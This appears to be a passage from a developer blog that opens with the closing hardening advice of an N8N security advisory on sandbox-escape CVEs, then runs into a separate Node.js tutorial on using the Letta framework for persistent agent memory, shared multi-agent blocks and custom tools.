N8N_RESTRICT_FILE_ACCESS_TO=true
N8N_BLOCK_FILE_ACCESS_TO_N8N_FILES=true
6. Audit stored credentials
If your N8N instance was exposed and you suspect compromise, rotate every credential stored in it. API keys, OAuth tokens, database passwords, all of it. N8N stores credentials encrypted at rest, but if the process was compromised, the encryption keys were in memory and accessible. Treat all stored secrets as leaked.
Update, isolate, restrict: the three-step response to any critical CVE in a self-hosted tool.
The Bigger Picture: Sandboxing Arbitrary Code Is a Hard Problem
None of this is unique to N8N. Any platform whose core proposition is “run whatever code you like” faces the same fundamental tension. Sandboxing is not a feature you bolt on after the fact; it has to be the architectural foundation. The Pragmatic Programmer puts it well: “Design to be tested.” You could equally say “design to be breached” β assume code will escape the sandbox and build your layers of defence accordingly.
The blacklist vs. whitelist distinction matters enormously here. A whitelist sandbox says: “you may use these ten system calls and nothing else.” A blacklist sandbox says: “you may not use these hundred things,” and then waits for an attacker to find item 101. Kernel-level sandboxing tools like seccomp-bpf on Linux are the right building block for the whitelist approach in a container environment. Language-level tricks β Pyodide, V8 isolates, WASM boundaries β are useful layers but are not sufficient on their own.
The complicating factor, as the Low Level video below notes, is that N8N’s architecture has many nodes and the contracts between them multiply the surface area considerably. Getting every node’s sandbox right simultaneously, especially under active development with a small team, is genuinely difficult. These CVEs are a reminder that security review needs to scale with the feature count, not lag behind it.
Video Attribution
Credit to the Low Level channel for the original technical breakdown of these CVEs. The walkthrough of the constructor injection exploit and the Pyodide internals is worth watching in full:
In the previous article on context management, we built the machinery by hand: sliding windows, compaction, PostgreSQL-backed memory stores, A2A handoffs. That is genuinely useful knowledge. But at some point you look at the boilerplate and think: surely someone has already solved the plumbing. They have. It is called Letta, it is open source, and it implements every pattern we discussed as a first-class runtime. This article is about how to actually use it, with Node.js, in a way that is production-shaped rather than tutorial-shaped.
Letta agents are stateful services: memory blocks orbit the agent like persistent satellites, and the database beneath is the source of truth.
What Letta Is (and What It Is Not)
Letta is the production evolution of MemGPT, a research project from UC Berkeley that demonstrated you could give an LLM the ability to manage its own memory through tool calls, effectively creating unbounded context. The research paper was elegant; the original codebase was academic. Letta is the commercial rewrite: a stateful agent server with a proper REST API, a TypeScript/Node.js client, PostgreSQL-backed persistence, and a web-based Agent Development Environment (ADE) at app.letta.com.
The key architectural commitment Letta makes is that the server owns all state. You do not manage a message array in your application. You do not serialise session state to disk. You do not build a compaction loop. You send a new user message, the Letta server handles the rest: it injects the right memory blocks, runs the agent, manages the context window, persists everything to its internal PostgreSQL database, and returns the response. Your application is stateless; Letta’s server is stateful. This is Kleppmann’s stream processing model applied to agents: the server is the durable log, and your application is just a producer/consumer.
What Letta is not: a model provider, a prompt engineering framework, or a replacement for your orchestration logic when you need bespoke control. It is an agent runtime. You still choose the model (any OpenAI-compatible endpoint, Anthropic, Ollama, etc.). You still design the tools. You still decide the architecture. Letta manages context, memory, and persistence so you do not have to.
Running Letta: Docker in Two Minutes
The fastest path to a running Letta server is Docker. One command, PostgreSQL included:
The server starts on port 8283. Agent data persists to the mounted volume. The ADE at https://app.letta.com can connect to your local instance for visual inspection and debugging. Point it at http://localhost:8283 and you have a full development environment with memory block viewers, message history, and tool call traces.
For production, you will want to externalise the PostgreSQL instance (a managed RDS or Cloud SQL instance), set LETTA_PG_URI to point at it, and run Letta behind a reverse proxy with TLS. The Letta server itself is stateless between requests; it is the database that holds everything. That means you can run multiple Letta instances behind a load balancer pointing at the same PostgreSQL, which is the correct horizontal scaling pattern.
Install the Node.js client:
npm install @letta-ai/letta-client
Connect to your local or remote server:
import Letta from '@letta-ai/letta-client';
// Local development
const client = new Letta({ baseURL: 'http://localhost:8283' });
// Letta Cloud (managed, no self-hosting required)
const client = new Letta({ apiKey: process.env.LETTA_API_KEY });
The Letta server stack: REST API on top, agent runtime in the middle, PostgreSQL at the bottom. Your app only sees the top layer.
Memory Blocks: The Core Abstraction
If you read the context management article, you encountered the concept of “always-in-context pinned memory”: facts that never get evicted, always present at the top of the system prompt. Letta formalises this as memory blocks. A memory block is a named, bounded string that gets prepended to the agent’s system prompt on every single turn, in a structured XML-like format the model can read and modify.
This is what the model actually sees in its context window:
<memory_blocks>
<persona>
<description>Stores details about your persona, guiding how you behave.</description>
<metadata>chars_current=128 | chars_limit=5000</metadata>
<value>I am Sam, a persistent assistant that remembers across sessions.</value>
</persona>
<human>
<description>Key details about the person you're conversing with.</description>
<metadata>chars_current=84 | chars_limit=5000</metadata>
<value>Name: Alice. Role: senior backend engineer. Prefers concise answers. Uses Node.js.</value>
</human>
</memory_blocks>
Three things make this powerful. First, the model can see the character count and limit, so it manages the block like a finite buffer rather than writing without restraint. Second, the description field is the primary signal the model uses to decide how to use each block: write a bad description and the agent will misuse it. Third, blocks are editable by the agent via built-in tools: when the agent learns something worth preserving, it calls core_memory_replace or core_memory_append, and that change is persisted immediately to the database and visible on the next turn.
Here is a full agent creation with custom memory blocks in Node.js:
// create-agent.js
import Letta from '@letta-ai/letta-client';
const client = new Letta({ baseURL: 'http://localhost:8283' });
const agent = await client.agents.create({
name: 'dev-assistant',
model: 'anthropic/claude-3-7-sonnet-20250219',
embedding: 'openai/text-embedding-3-small', // required for archival memory search
memory_blocks: [
{
label: 'persona',
value: 'I am a persistent dev assistant. I remember what you are working on, your preferences, and your past decisions. I am direct and do not pad answers.',
limit: 5000,
},
{
label: 'human',
value: '', // starts empty; agent fills this in as it learns about the user
limit: 5000,
},
{
label: 'project',
description: 'The current project the user is working on: name, stack, key decisions, and open questions. Update whenever the project context changes.',
value: '',
limit: 8000,
},
{
label: 'mistakes',
description: 'A log of mistakes or misunderstandings from past conversations. Consult this before making similar suggestions. Add to it when corrected.',
value: '',
limit: 3000,
},
],
});
console.log('Agent created:', agent.id);
// Save this ID β it is the persistent identifier for this agent across all sessions
The project and mistakes blocks are custom: Letta does not know what they are for, but the model does, because you told it in the description field. This is where Hofstadter’s recursion shows up in the most practical way: you are configuring an agent’s memory by describing to the agent what memory is for, and the agent then self-organises accordingly.
Sending Messages: The Stateless Caller Pattern
This is the part that trips up developers coming from a hand-rolled context manager. With Letta, you do not maintain a message array. You do not pass the conversation history. You send only the new message. The server knows the history:
// chat.js
import Letta from '@letta-ai/letta-client';
const client = new Letta({ baseURL: 'http://localhost:8283' });
async function chat(agentId, userMessage) {
const response = await client.agents.messages.create(agentId, {
messages: [
{ role: 'user', content: userMessage },
],
});
// Extract the final text response from the run steps
const textResponse = response.messages
.filter(m => m.message_type === 'assistant_message')
.map(m => m.content)
.join('\n');
return textResponse;
}
// First message: the agent starts learning about the user
const reply1 = await chat('agent-id-here', 'Hi, I\'m working on a Node.js API that serves a mobile app. Postgres for data, Redis for sessions.');
console.log(reply1);
// Second message, completely separate process invocation:
// The agent already knows everything from the first message.
const reply2 = await chat('agent-id-here', 'What database am I using again?');
console.log(reply2); // β "You're using Postgres for data and Redis for sessions."
The agent’s memory block for project was updated by the model itself during the first turn via its built-in memory tools. On the second turn, that block is injected back into context automatically. Your application code never touched any of it.
You can inspect what the agent currently knows at any point via the API:
// Peek at the agent's current memory state
const projectBlock = await client.agents.blocks.retrieve(agentId, 'project');
console.log('What the agent knows about your project:');
console.log(projectBlock.value);
Memory blocks with their character limits visible to the model: the agent manages them like bounded buffers, not infinite strings.
Archival Memory: The Infinite Store
Memory blocks are bounded (5,000 characters by default). For anything that does not fit, Letta provides archival memory: an external vector store backed by pgvector (in the self-hosted setup) or Letta Cloud’s managed index. The agent accesses it via two built-in tool calls that appear in its context as available tools: archival_memory_insert and archival_memory_search.
You do not have to configure these tools; they are always present. When the agent encounters a piece of information that is too large or too ephemeral for a core memory block, it decides to archive it. When it needs to recall something from the past, it issues a semantic search. All of this is embedded in the agent’s reasoning loop, not your application code.
You can also write to archival memory programmatically from your application, which is useful for seeding an agent with existing knowledge:
// seed-archival-memory.js
// Useful for bulk-loading documentation, past conversation summaries,
// or domain knowledge before the agent starts interacting with users
async function seedKnowledge(agentId, documents) {
for (const doc of documents) {
await client.agents.archivalMemory.create(agentId, {
text: doc.content,
});
console.log(`Seeded: ${doc.title}`);
}
}
// Example: seed with codebase context
await seedKnowledge(agentId, [
{ title: 'Auth module', content: 'The authentication module uses JWT with 24h expiry. Refresh tokens stored in Redis with 30-day TTL. See src/auth/...' },
{ title: 'DB schema', content: 'Main tables: users, sessions, events. users.id is UUID. events has a JSONB payload column...' },
{ title: 'Deployment', content: 'Production runs on Render. Two services: api (Node.js) and worker (Bull queue). Shared Postgres on Supabase...' },
]);
// Search archival memory (what the agent would do internally)
const results = await client.agents.archivalMemory.list(agentId, {
query: 'authentication refresh token',
limit: 5,
});
Multi-Agent Patterns with Shared Memory Blocks
This is where Letta’s design diverges most sharply from a DIY approach. In our context management article, the A2A section covered how to pass context between agents via structured handoff payloads. Letta adds a second mechanism that is often cleaner: shared memory blocks. A block attached to multiple agents is simultaneously visible to all of them. When any agent updates it, all agents see the change on their next turn.
The coordination pattern this enables: a supervisor agent writes its plan to a shared task_state block. All worker agents have that block in their context windows. The supervisor does not need to message each worker explicitly; the workers read the shared state and self-coordinate. This is closer to a shared blackboard than a message bus, and for many use cases it is significantly simpler:
// multi-agent-setup.js
import Letta from '@letta-ai/letta-client';
const client = new Letta({ baseURL: 'http://localhost:8283' });
// Create a shared state block
const taskStateBlock = await client.blocks.create({
label: 'task_state',
description: 'Current task status shared across all agents. Supervisor writes the plan and tracks progress. Workers read their assignments and update status when done.',
value: JSON.stringify({ status: 'idle', tasks: [], results: [] }),
limit: 10000,
});
// Create supervisor agent
const supervisor = await client.agents.create({
name: 'supervisor',
model: 'anthropic/claude-3-7-sonnet-20250219',
memory_blocks: [
{ label: 'persona', value: 'I coordinate teams of specialist agents. I decompose tasks, assign them, and synthesise results.' },
],
block_ids: [taskStateBlock.id], // attach shared block
});
// Create worker agents β all share the same task state block
const workers = await Promise.all(['code-analyst', 'security-reviewer', 'doc-writer'].map(name =>
client.agents.create({
name,
model: 'anthropic/claude-3-5-haiku-20241022', // cheaper model for workers
memory_blocks: [
{ label: 'persona', value: `I am a specialist ${name} agent. I read my assignments from task_state and write my results back.` },
],
block_ids: [taskStateBlock.id],
tags: ['worker'], // tags enable broadcast messaging
})
));
For direct agent-to-agent messaging, Letta provides three built-in tools the model can call: send_message_to_agent_async (fire-and-forget, good for kicking off background work), send_message_to_agent_and_wait_for_reply (synchronous, good for gathering results), and send_message_to_agents_matching_all_tags (broadcast to a tagged group).
The supervisor-worker pattern with broadcast looks like this from the application perspective:
// Run the supervisor with a task; it handles delegation internally
const result = await client.agents.messages.create(supervisor.id, {
messages: [{
role: 'user',
content: 'Review the PR at github.com/org/repo/pull/42. Get security, code quality, and docs perspectives.',
}],
});
// The supervisor will internally:
// 1. Decompose the task into three sub-tasks
// 2. Call send_message_to_agents_matching_all_tags({ tags: ['worker'], message: '...' })
// 3. Each worker agent processes its sub-task
// 4. Results flow back to the supervisor
// 5. Supervisor synthesises and responds to the original message
// You can watch the shared block update in real time:
const state = await client.blocks.retrieve(taskStateBlock.id);
console.log(JSON.parse(state.value));
Conversations API: One Agent, Many Users
The multi-user pattern in Letta has two flavours. The simpler one: create one agent per user. Each agent has its own memory blocks and history. Clean isolation, straightforward. The more powerful one, added in early 2026: the Conversations API, which lets multiple users message a single agent through independent conversation threads without sharing message history.
This is the right pattern for a shared assistant that should have a consistent persona and knowledge base across all users, while keeping each user’s conversation private:
// conversations.js
// Create a single shared agent (one-time setup)
const sharedAssistant = await client.agents.create({
name: 'company-assistant',
model: 'anthropic/claude-3-7-sonnet-20250219',
memory_blocks: [
{
label: 'persona',
value: 'I am the Acme Corp internal assistant. I know our products, policies, and engineering practices.',
},
{
label: 'policies',
description: 'Company policies. Read-only. Do not modify.',
value: 'Data retention: 90 days. Escalation path: ops β engineering β CTO. ...',
read_only: true,
},
],
});
// Each user gets their own conversation thread with this agent
async function getUserConversation(agentId, userId) {
// List existing conversations for this user
const conversations = await client.agents.conversations.list(agentId, {
user_id: userId,
});
if (conversations.length > 0) {
return conversations[0].id; // resume existing
}
// Create a new conversation thread for this user
const conversation = await client.agents.conversations.create(agentId, {
user_id: userId,
});
return conversation.id;
}
// Send a message within a user's private conversation thread
async function sendMessage(agentId, conversationId, userMessage) {
return client.agents.messages.create(agentId, {
conversation_id: conversationId,
messages: [{ role: 'user', content: userMessage }],
});
}
// Usage: two users, one agent, completely isolated message histories
const aliceConvId = await getUserConversation(sharedAssistant.id, 'user-alice');
const bobConvId = await getUserConversation(sharedAssistant.id, 'user-bob');
await sendMessage(sharedAssistant.id, aliceConvId, 'What is our data retention policy?');
await sendMessage(sharedAssistant.id, bobConvId, 'How do I escalate a prod incident?');
The shared memory block as coordination primitive: supervisor and workers all read from and write to the same block without explicit messaging.
Connecting to What We Built Before
If you built the context manager from the previous article, you already understand what Letta is doing under the hood. The memory blocks are the workspace injection layer (SOUL.md, USER.md, etc.) made into a first-class API. The built-in memory tools are the memoryFlush hook, made automatic. The Conversations API is the session store with user-scoped RLS, managed for you. The archival memory tools are the PostgresMemoryStore with pgvector, managed for you.
The practical question is when to use Letta versus building your own. The answer is usually: use Letta when the standard patterns fit, build your own when they do not. Letta is excellent for: persistent user-facing assistants, multi-agent systems with shared state, anything where you need reliable memory across sessions without owning the infrastructure. Build your own when: you need sub-millisecond latency and cannot afford the Letta server round-trip, you need extreme control over what enters the context window, or you are building a very specialised agent loop that does not match any of Letta’s patterns.
You can also combine both: use Letta for its memory management while driving the agent loop from your own orchestration code. Create the agent via Letta’s API, send messages via the SDK, but handle tool routing, A2A handoffs, and business logic in your application layer:
// hybrid-orchestrator.js
// Use Letta for memory; own your tool routing
import Letta from '@letta-ai/letta-client';
import { handleA2AHandoff } from './a2a-context-bridge.js';
import { handleDomainTool } from './domain-tools.js';
const client = new Letta({ baseURL: 'http://localhost:8283' });
async function runTurn(agentId, userMessage, userId) {
const response = await client.agents.messages.create(agentId, {
messages: [{ role: 'user', content: userMessage }],
// Inject user ID as context so the agent can reference who it's talking to
stream_steps: false,
});
// Process any tool calls that need external routing
for (const step of response.messages) {
if (step.message_type === 'tool_call' && step.tool_name === 'delegate_to_agent') {
// Route A2A handoffs through our own bridge
const handoffResult = await handleA2AHandoff(step.tool_arguments, userId);
// Inject the result back into the agent's context as a tool result
await client.agents.messages.create(agentId, {
messages: [{
role: 'tool',
content: JSON.stringify(handoffResult),
tool_call_id: step.tool_call_id,
}],
});
}
if (step.message_type === 'tool_call' && step.tool_name.startsWith('domain_')) {
const result = await handleDomainTool(step.tool_name, step.tool_arguments);
await client.agents.messages.create(agentId, {
messages: [{
role: 'tool',
content: JSON.stringify(result),
tool_call_id: step.tool_call_id,
}],
});
}
}
return response.messages
.filter(m => m.message_type === 'assistant_message')
.map(m => m.content)
.join('\n');
}
Deploying Custom Tools
Letta supports three tool types. Server-side tools have code that runs inside the Letta server’s sandboxed environment: safe for untrusted logic, limited in what they can access. MCP tools connect to any Model Context Protocol server: your agent can use any tool exposed by an MCP-compatible service (file systems, databases, web browsers, code execution). Client-side tools return only the JSON schema to the model; your application handles execution and passes the result back.
For production integrations, client-side tools are usually the right choice: your application owns the execution environment, credentials, and error handling. Register the schema with Letta so the model knows the tool exists; intercept the tool call in your application code:
// register-tools.js
// Register a client-side tool (schema only β you handle execution)
const dbQueryTool = await client.tools.create({
name: 'query_database',
description: 'Execute a read-only SQL query against the application database. Use for looking up user data, orders, or product information.',
tags: ['database', 'read-only'],
source_type: 'json', // client-side: no code, just schema
json_schema: {
name: 'query_database',
description: 'Execute a read-only SQL query',
parameters: {
type: 'object',
properties: {
query: {
type: 'string',
description: 'The SQL query to run. SELECT only. No mutations.',
},
limit: {
type: 'number',
description: 'Maximum rows to return (default 20, max 100).',
},
},
required: ['query'],
},
},
});
// Attach the tool to an agent
await client.agents.tools.attach(agentId, dbQueryTool.id);
What to Watch Out For
The agent creates its own memory; don’t fight it. The model decides what goes into memory blocks and when. If the agent is not remembering something you expect it to, improve the description field on the relevant block. The description is the only instruction the model has for deciding when to write to that block.
Block limits are character counts, not token counts. A 5,000-character block costs roughly 1,250 tokens in your context window on every turn. If you have six blocks at 5,000 chars each, you have already spent 7,500 tokens before a single message is processed. Be deliberate about how many blocks you create and how large they are.
Shared blocks have last-write-wins semantics. If two agents update the same shared block concurrently, the last write overwrites the earlier one. For coordination state that multiple agents write, use a structured JSON format inside the block and have agents do read-modify-write operations carefully. Or use a dedicated supervisor agent as the sole writer.
One agent per user is not always the right model. For a large user base, thousands of agents each with their own archival memory index can become expensive to manage. The Conversations API lets one agent serve many users without multiplying infrastructure; evaluate whether your use case actually needs per-user agents or just per-user conversation isolation.
Seed archival memory before go-live. An agent with an empty archival store has no domain knowledge beyond its system prompt. Invest time before launch in bulk-loading your codebase context, documentation, past decision logs, or relevant domain content. A well-seeded archival store transforms a generic assistant into something that genuinely knows your system.
Use Claude 3.5 Haiku or GPT-4o mini for worker agents in multi-agent systems. The frontier models (Claude 3.7 Sonnet, GPT-4o) are necessary for the supervisor that does planning and synthesis; they are overkill for workers executing narrow, well-defined tasks. The cost difference is roughly 10x; the capability difference for simple tasks is negligible.
Heartbeats are the agent’s “thinking” loop. When a tool call returns request_heartbeat: true, Letta re-invokes the agent so it can reason about the result before responding. This is how multi-step reasoning works. Do not disable heartbeats on tasks that require chaining tool calls; you will get shallow, single-step responses.